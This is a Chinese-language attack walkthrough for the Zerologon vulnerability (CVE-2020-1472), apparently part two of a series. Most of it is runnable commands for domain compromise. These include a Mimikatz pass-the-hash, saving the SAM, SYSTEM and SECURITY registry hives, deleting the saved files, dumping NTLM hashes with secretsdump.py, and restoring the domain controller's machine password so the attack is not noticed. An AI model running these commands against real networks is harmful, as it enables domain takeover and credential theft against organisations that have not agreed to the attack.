CVE-2020-1472 Zerologon (2)

0x03 PTH of Mimikatz privilege::debug sekurlsa::pth /user:administrator /domain:<domain> /rc4:<NTLM hash> 之后会弹出一个cmd 0x04恢复hash

这里因为之前通过NetLogon将账号hash置为空，后续获得域管hash后需要赶紧将之前在SAM文件保存的hash去恢复，否则会脱域。

导出SAM

保存 sam.save 、security.save 、 system.save

reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save # 获取文件路径 get system.saveget sam.save get security.save # 删除文件 del /f system.save del /f sam.save del /f security.save 获取原来的NTLM Hash python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

通过拿到 $MACHINE.ACC: 的值，然后进行恢复：注意只有后半部分：

恢复Hash python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca 验证恢复结果 python3 secretsdump.py Motoo.nc/Motoo-DCSRV$@192.168.159.149 -just-dc-no-pass python3 secretsdump.py Motoo.nc/Motoo-DCSRV$@192.168.159.149 -no-pass # 四个空格

0x05 小Tips

如何寻找域控计算机名？

# 不在域内 nbtscan扫描 nmap smb嗅探 nslookup <域控ip> 有时dns服务器也搭在域控上 # 在域内 命令查询 参考文章

https://cloud.tencent.com/developer/article/1780108

https://github.com/VoidSec/CVE-2020-1472

https://github.com/bb00/zer0dump

https://blog.zsec.uk/zerologon-attacking-defending/

https://cloud.tencent.com/developer/article/1753595